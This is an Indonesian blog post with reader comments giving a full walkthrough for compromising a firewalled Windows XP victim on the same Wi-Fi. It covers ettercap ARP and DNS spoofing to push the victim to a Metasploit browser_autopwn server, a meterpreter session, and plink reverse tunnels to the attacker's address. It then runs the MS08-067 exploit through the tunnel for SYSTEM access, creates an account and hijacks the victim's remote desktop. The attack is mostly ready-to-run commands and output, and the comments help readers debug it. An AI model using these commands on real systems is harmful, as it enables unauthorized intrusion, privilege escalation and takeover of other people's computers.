Searching...
October 21, 2011
Friday, October 21, 2011

[ADVANCE] Metasploit Bypass Firewall

Hehe.. Jangan bosen-bosennya membaca post dari saya ya? Kali ini saya mau sharing metasploit.. Memang mudah mengeksploit Windows XP Service Pack 2 tanpa firewall.. Tapi kalo dipasang firewall?? Lalu gimana jika korban ternyata bukan seorang administrator, dimana privilege nya sangat terbatas?? Saya akan beritau caranya, tutorial ini akan panjang, jadi sarankan jika ingin membaca tutorial ini, siapkan secangkir kopi dan sebatang rokok..

Briefing:
Pastikan anda memiliki program ini:
1. nmap
2. metasploit
3. ettercap

Tutorial:
Hal penting yang harus diketahui adalah menyadari bahwa korban menggunakan firewall, sehingga membatasi perintah ping dari luar, bagaimana cara mengetahuinya?

Buka terminal, lalu ketik


Code:
nmap [IP address korban]

Contoh, korban memiliki IP address 192.168.1.10, maka perintahnya adalah:
Code:
nmap 192.168.1.10

Jika korban memang menggunakan firewall, maka outputnya akan tampak seperti ini
Code:
All 1000 scanned ports on 192.168.1.10 are filtered

Dalam kasus seperti ini, anda tidak dapat menggunakan exploit standar
Code:
exploit/windows/smb/ms08_067_netapi

Karena hasilnya akan nihil, karena koneksi ditolak oleh firewall. Lalu, bagaimana cara melewati firewall ini??

Buka metasploit kamu:


root@red-dragon:/# cd /pentest/exploits/framework2/
root@red-dragon:/pentest/exploits/framework2# ./msfconsole 

Kemudian gunakan auxiliary browser_autopwn


msf > use auxiliary/server/browser_autopwn
msf  auxiliary(browser_autopwn) > show options
Kemudian atur auxiliary kamu.
msf  auxiliary(browser_autopwn) > set LHOST [ip address kamu]
msf  auxiliary(browser_autopwn) > set SRVHOST [ip address kamu]
msf  auxiliary(browser_autopwn) > set SRVPORT 80
msf  auxiliary(browser_autopwn) > set URIPATH /

Terakhir, jalankan auxiliary kamu.
msf  auxiliary(browser_autopwn) > exploit -j

Tunggu sampai semua exploit dan payload berhasil di siapkan, kemudian kita akan bermain ke jaringan.

Menunggu memang membosankan, jadi lebih baik kita routing koneksi korban ke IP address kita. Perlu diketahui, auxiliary/server/browser_autopwn akan bereaksi jika korban mengakses IP address kita melalui browser internet. Ini akan memperkecil peluang eksploitasi, untuk itu daripada menunggu tanpa kepastian, lebih baik membuat kepastian. Gunakan dns_spoofing ettercap. :)

Sebelum memulai spoofing dns, kita harus mengatur ulang konfigurasi dns. Caranya, buka terminal, lalu ketik:
Code:
root@red-dragon:/# gedit /usr/share/ettercap/etter.dns

Hapus semua, dan masukan
Code:
* A [IP address kamu]
Jika IP address kamu 192.168.1.2, maka
Code:
* A 192.168.1.2

Simpan konfigurasi, kemudian eksekusi spoofing dns menggunakan ettercap.
Code:
root@red-dragon:/# ettercap -i [interface] [option] /target 1/ /target 2/

Dalam kasus ini, saya berada di wifi area, IP address korban 192.168.1.10, dan IP address access poin 192.168.1.1
Maka.
- Interface = wlan0
- target 1 = 192.168.1.1
- target 2 = 192.168.1.10


Masukan perintah ini ke dalam terminal:
Code:
root@red-dragon:/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.10/

Dengan ini, alamat apapun yang korban masukan di address bar akan menjadi ----> 192.168.1.2 alias IP address kita. Dengan ini, metasploit akan bereaksi terhadap klien yang mengakses IP address kita melalui browser internetnya.

Perhatikan output metasploit:

[*] request '/' from 192.168.1.10:1809
[*] request '/?essid=xxxxxxxxxxxxxx' from 192.168.1.10:1809
[*] responding with exploits
[*] ending internet explorer COM CreateObject Code Execution exploit HTML to 192.168.1.10:1809
[*] sending EXE payload to 192.168.1.10:1809
[*] sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:3333 -> 192.168.1.10:1809)


Memasuki tahap meterpreter dalam komputer yang tidak memiliki akses khusus layaknya administrator tidaklah terlalu menyenangkan. Selain hak yang dibatasi, tidak akan ada banyak perintah yang berfungsi dalam command prompt. Untuk mengangkat privilege, kita harus masuk ke sesi meterpreter terlebih dahulu. Masukan perintah ini di dalam metasploit:
Code:
msf  auxiliary(browser_autopwn) > session -i l

Ini berfungsi untuk berinteraksi dengan meterpreter sesi pertama.


meterpreter > getuid

Outpunya:
user

Ini menunjukan bahwa pengguna bernama user.

meterpreter > shell
C:\Documents and Settings\user\Desktop> net user stdio stdio /add

Perintah ini akan gagal diekseksi, karena pengguna tidak menjalankan komputer atau leptopnya atas nama administrator. Jika bagini, kita membutuhkan software jahat yang disediakan backtrack untuk mengubah user menjadi administrator.

C:\Documents and Settings\user\Desktop> netstat -an
Perhatikan port 445 yang terbuka dalam network status. Kemudian kita kembali lagi pada sesi meterpreter, untuk mengupload program jahat.

C:\Documents and Settings\user\Desktop>exit
meterpreter > upload /pentest/windows-binaries/tools/plink.exe "C:\\documents and settings\user\desktop\\"
Jika upload berhasil, langkah selanjutnya adalah kembali lagi ke command prompt untuk mengeksekusi program jahat tersebut.
meterpreter > shell
C:\Documents and Settings\user\Desktop>plink.exe -l [username] -pw [password] -R port:localhost:port [ip address kamu]


Contoh dalam kasus ini, saya ingin username saya root, dan password toor, dengan port 445 yang terbuka, dan IP local host 127.0.0.1 dan ip address saya 192.168.1.2 maka:
-l = root
-pw = toor
ip address = 192.168.1.2

Jadi masukan perintah ini:

C:\Documents and Settings\user\Desktop>pling.exe -l root -pw toor -R 445:127.0.0.1:445 192.168.1.2

Buka terminal baru dan ketik:

root@red-dragon:~# netstat -antp |grep 445

Jika 127.0.0.1ada dalam daftar, maka kita siap melakukan exploitasi tahap kedua. Masukan perintah berikut:
./pentest/exploits/framework3/msfconsole
Code:
msf > use exploit/windows/smb/ms08_067_netapi
Code:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Code:
msf exploit(
ms08_067_netapi) > set LHOST 192.168.1.2
Code:
msf exploit(
ms08_067_netapi) > set RHOST 127.0.01
Code:
msf exploit(
ms08_067_netapi) > set RPORT 445
Code:
msf exploit(
ms08_067_netapi) > exploit -j

OUTPUT:
[*]Started reverse handler on 192.168.1.2:4444
[*]Automatically detecting the taget..
[*]Fingerprint: Windows XP Service Pack 2 - lang:English
[*]Selected Target: Windows XP SP 2 English (NX)
[*]Triggering the vulnerability...
[*]Sending stage (748032 bytes)
[*]Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.10:1809)

meterpreter >

Pada meterpreter ini, kita akan menguji apakah kita sudah menjadi administrator atau belum:
Masukan kode berikut:

Code:
meterpreter > getuid

Jika kita sudah menjadi administrator, maka outputnya akan tampak seperti ini:
Code:
meterpreter > NT AUTHORITY\SYSTEM

Cukupkah? Saya rasa belum jika kita belum meremote desktop korban. Perlu diingat bahwa koneksi VNC (Program untuk remote desktop) berjalan di port 3389. Kembali kita gunakan tplink.exe


meterpreter > shell
C:\WINDOWS\system32>cd c:\documents and settings\user\desktop
C:\Documents and Settings/user/Desktop> net stdio stdio /add
C:\Documents and Settings/user/Desktop> C:
C:\tplink.exe -l root -pw toor 3389:127.0.0.1:3389 192.168.1.2


Untuk meremote desktop korban, kita hanya perlu mengeksekusi rdesktop. Buka terminal baru, lalu masukan perintah:
Code:
rdesktop 127.0.01

Untuk Username, masukan root.
Dan untuk password, masukan toor.

GAME OVER. Desktop sudah kamu kendalikan. Keyboard, dan mouse ada dalam kuasa kita.



Powered by: Metasploit ettercap blue-dragon


Thanks for Yoshephine Handini for yout support and love

14 comment:

  1. waktu saya coba, ketika saya mulai menggunakan use auxiliary/server/browser_autopwn kok ngga bisa ya ?
    yang keluar malah msfconsole: use: please specify a valid exploit name

    saya sudah benar loh penulisannya

    ReplyDelete
  2. kalau menggunakan jaringan internet kabel, bagaimana perintah pada ettercap ?

    ReplyDelete
  3. coba ketik: show auxiliary

    kalo emang di list-nya gak ada auxiliary/server/browser_autopwn

    berarti belum update. coba update msf-nya.

    untuk jaringan kabel, ganti wlan0 menjadi eth0 pada section interface (-i)

    ReplyDelete
  4. /# ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.10/

    yang keluar malah gini :
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


    MITM method 'ARP-REMOTE' not supported...

    bagaimana mengatasinya. saya menggunakan jaringan kabel

    ReplyDelete
  5. Versi 0.7.3 ya?

    Ganti jadi ARP:REMOTE

    ReplyDelete
  6. Mas Omega yang di edit scrip /usr/local/share/ettercap/etter.dns di bagian mana....atau kah semua scrip nya di hapus atau cuma di bagian A aja...

    dan ARP-REMOTE di BT saya juga gak suport...
    gmana dengan cara begini ettercap -T -q -i eth1 -P dns_spoof -M arp // //
    atau kah sma......????

    ReplyDelete
  7. cukup tambahkan saja
    * A [IP Address Backtrack]
    Pada baris terakhir.

    Untuk interface eth1, perintahnya adalah:
    ettercap -T -q -i eth1 -M ARP:REMOTE // // -P dns_spoof

    ReplyDelete
  8. maaf saya mau tanya om dan sekalian juga kepada master master metasploit nih..
    saya newbie neh jadi agak bego, begini saya udah lakukan nmap IP Target dan hasil nya :

    Nmap scan report for 192.168.x.xx
    Host is up (0.00068s latency).
    Not shown: 993 closed ports
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1433/tcp open ms-sql-s
    2222/tcp open EtherNet/IP-1
    3389/tcp open ms-term-serv
    4899/tcp open radmin
    MAC Address: 00:1A:92:62:A2:5C (Asustek Computer)

    Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds
    msf >

    pertanyaanya apakah ini berarti firewall komp target tidak aktive

    dan setelah saya exploit dengan use /windows/smb/ms08_067_netapi
    dan payload set payload windows/shell/reverse_tcp
    lalu set lhost ip saya
    dan set rhost ip target
    dan terakhir exploit dan alhasil :

    [*] Started reverse handler on 192.168.1.112:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP - Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
    [*] Attempting to trigger the vulnerability...
    msf exploit(ms08_067_netapi) >

    kenapa tidak ada kelanjutan nya ya seperti cth di atas :

    [*]Sending stage (748032 bytes)
    [*]Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.10:1809)

    mohon pencerahan nya terima kasih banyak dan mohon maaf ngerepotin sebelumnya.salam


    ReplyDelete
    Replies
    1. Ada kemungkinan target menggunakan antivirus. Kemungkinan lain adalah target telah melakukan patching pada netapi.dll. Sehingga vulnerability tidak terpicu.

      Delete
  9. ditempat ane IP address access pointnya ga ketauan karna pake proxy. Apa kaya gini bisa ?
    ettercap -i [interface] [option] /target 1/ /target 2/
    dimana :
    interface : wlan0
    ip address korban : 192.168.1.39
    ip address proxy : 192.168.1.240

    Atau ada cara supaya bisa liat ip address access point? makasih gan

    ReplyDelete
  10. kalo kyk gini kenapa yah?

    ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.100/


    ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team


    MiTM method 'ARP-REMOTE' not supported...

    ReplyDelete
  11. gan kalau di windoaws 7 bisa kagak

    ReplyDelete
  12. bravo!!!! bravo!!! bro contac me we have sometthing to disscuss
    gua ingin ngobrol banyak...... (h) (h) (h)

    ReplyDelete

 
Back to top!